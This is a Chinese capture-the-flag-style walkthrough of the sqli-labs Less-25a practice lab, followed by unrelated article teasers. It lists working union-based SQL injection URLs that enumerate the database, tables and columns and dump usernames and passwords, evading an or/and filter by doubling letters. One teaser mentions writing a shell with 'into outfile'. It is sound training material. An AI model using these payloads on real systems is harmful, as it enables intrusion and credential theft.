sqli-labs less-25a

Sqli-labs less-25a

在这里插入图片描述

判断注入类型,列数及注入点

构造

http://192.168.140.130/sq/Less-25a/?id=1
回显正常

http://192.168.140.130/sq/Less-25a/?id=1’
报错

构造

http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
回显正常
http://192.168.140.130/sq/Less-25a/?id=1 and 1=1
报错

确定为数字型注入

http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 1
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 2
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 3
http://192.168.140.130/sq/Less-25a/?id=1 oorrder by 4
4的时候报错,确定列数为3

构造

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,2,3

确定注入点2,3

爆数据

数据库名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select database()),3

表名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()),3
注意informatrion中or字符的绕过
在这里插入图片描述

列名

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name=‘users’),3
注意or与and字符绕过
在这里插入图片描述

数据

http://192.168.140.130/sq/Less-25a/?id=0 union select 1,(select group_concat(username,‘~’,passwoorrd) from security.users),3
==注意password字符中or的绕过
在这里插入图片描述

*** OVER!***

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/894736.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

RabbitMQ 入门(三)SpringAMQP五种消息类型(Basic Queue)

一、Spring AMQP 简介 SpringAMQP是基于RabbitMQ封装的一套模板,并且还利用SpringBoot对其实现了自动装配,使用起来非常方便。 SpringAmqp的官方地址:https://spring.io/projects/spring-amqp SpringAMQP提供了三个功能: - 自动…

唐布拉不是家,而我途径它(一)

唐布拉不是家,而我途径它 旅途是一本书,风吹哪页读哪页,笔搁哪句写哪句。 最后一站在唐布拉的尼勒克,晚上11点才到,车停在门口,打开车门就看到这句话: 希望你快乐 今天 明天 天天刚下完雨&am…

2024年诺贝尔物理学奖揭晓:AI背后的“造梦者”是谁?

想象一下,你早上醒来,智能音箱为你播放天气和新闻,中午你用手机刷视频,精准的推荐内容简直和你心有灵犀,晚上回家,自动驾驶汽车安全地把你送回家。这一切看似理所当然,背后却有一双无形的手推动…

双向链表常见接口实现

一 . 链表的分类 链表的结构非常多样,以下情况组合起来就有8种( 2 * 2 * 2 ) 链表结构 : 1.1 单向/双向 1 . 单向 : 只能往一个方向遍历 (仅有一个指针 --> 指向下一个结点的地址), 如下图 : 只能从d1找到d2 , d2 找不到d1 2 . 双向 : 能从两个方向遍历 ( 有指向下一个结点…

Leetcode 841. 钥匙和房间

1.题目基本信息 1.1.题目描述 有 n 个房间,房间按从 0 到 n – 1 编号。最初,除 0 号房间外的其余所有房间都被锁住。你的目标是进入所有的房间。然而,你不能在没有获得钥匙的时候进入锁住的房间。 当你进入一个房间,你可能会在…

深度解析服务级别协议(SLA):保障业务稳定性的关键承诺

前言: 在当今数字化时代,企业的业务连续性和稳定性至关重要。服务级别协议(SLA)作为服务提供商与客户之间的正式承诺,是确保服务质量、可用性、责任的重要工具。SLA不仅定义了服务提供商应达到的服务指标,还…

华为ENSP Truck命令指南:从入门到精通的全方位解析 引言

博客标题:华为ENSP Truck命令指南:从入门到精通的全方位解析 引言 在网络工程的世界里,华为ENSP(Enterprise Network Simulation Platform)作为一款强大的网络模拟工具,为我们提供了在虚拟环境中实践和学习…

MySQL程序介绍<一>

目录 MySQL程序简介 mysqld - MySQL 服务器 ​编辑 mysql - MySQL 命令⾏客⼾端 MySQL程序简介 1.MySQL安装完成通常会包含如下程序: Linux系统程序⼀般在 /usr/bin⽬录下,可以通过命令查看 windows系统⽬录: 你的安装路径\MySQL Server…

【Linux-基础IO】软硬链接+动静态库

一、软硬链接 见一见 软连接 硬连接 通过观察我们发现以下几点: 1.ll - i后,软连接形成的文件有指向,并且软连接的Inode编号与对应文件的Inode编号不一样 2.ll - i后,硬连接形成的文件与对应的文件Inode编号一样 3.软连接…

从零开始在Windows系统上搭建一个node.js后端服务项目

目录 一、下载node.js及配置环境 二、搭建node.js项目及安装express框架 三、集成nodemon,实现代码热部署 四、Express 应用程序生成器 一、下载node.js及配置环境 网上很多安装教程,此处就不再赘述了 版本信息 C:\Users\XXX>node -v v20.15.0…

一个纹理分割的例子

纹理是图像分割常用的特征,即使不是纹理分割。Rafael Gonzalez和Richard Woods的《数字图像处理》中这部分内容片面了。 给一个利用简单的统计特征——熵进行纹理分割的例子。这个例子是说明阈值分割不是仅适用于灰度值的情况,也可以用于纹理&#xff…

【into outfile写文件】

简介 select * from user into outfile C:/Users/ichunqiu/Desktop/PhpStudy2018/PHPTutorial/WWW/1.txt;用法的意思就是把user表中查询到的所有字段都导出到1.txt文件中 我们之前还有学到dumpfile,单是它只能导出一条数据 写入shell 测试注入点 usernameadmin&…

SAP SD学习笔记09 - 受注传票中的不完全Log 和 Business Partner(取引先机能)

好久没写SD了,今天继续写。 上一章讲了SD的如下知识 - SD的售前的流程(引合和見積(询价和报价)) - 数据流的概念,主要就是后传票可以参照前传票,以实现数据的流动,减少输入 - Co…

C++之“构造函数”

文章目录 类的默认成员函数构造函数 类的默认成员函数 默认成员函数就是我们没有在main函数里调用,但是编译器会自动生成的成员函数称为默认成员函数。 C由8个默认成员函数,我们暂时了解6个。 默认成员函数:构造函数,析构函数&a…

面试应该问什么?

在求职者面试的过程中,向面试官提问是一个展现自己积极态度、对职位和公司兴趣以及进一步了解工作环境和职业发展机会的重要环节。以下是一些求职者可以在面试中向面试官提问的问题,这些问题旨在帮助你更全面地了解未来的工作环境、团队文化、以及个人职…

adb devices没找到安卓设备的解决办法

要想让设备让adb识别到,要开启设备的开发者模式,并且开启USB调试功能: 然后重新运行:就找到了

java 文件File类概述

前言 在Java中,File类是一个与文件和目录(文件夹)路径名相关的抽象表示形式。它是java.io包中的一个重要类,用于表示和操作文件系统中的文件和目录。 File类的基本概念 表示路径:File类既可以表示文件路径&#xff…

OpenCV高级图形用户界面(8)在指定的窗口中显示一幅图像函数imshow()的使用

操作系统:ubuntu22.04 OpenCV版本:OpenCV4.9 IDE:Visual Studio Code 编程语言:C11 算法描述 在指定的窗口中显示一幅图像。 函数 imshow 在指定的窗口中显示一幅图像。如果窗口是以 cv::WINDOW_AUTOSIZE 标志创建的,图像将以原…

操作系统 和 初识进程

目录 操作系统(OS) 进程 操作系统(OS) 概念 操作系统即os,是一款软件。 任何计算机系统都包含一个基本的程序集合,称为操作系统(OS)。 操作系统的本质是一种进行软硬件管理的软件 笼统的理解&#xf…

用Java做智能客服,基于私有知识库

构建Java智能客服系统的整体思路 使用Java构建智能客服系统的整体思路是: 首先将客服QA文档以Word形式导入到系统中,通过向量化处理存入知识库。 当用户提出问题时,系统会根据问题内容从知识库中检索相关的上下文信息,并结合大…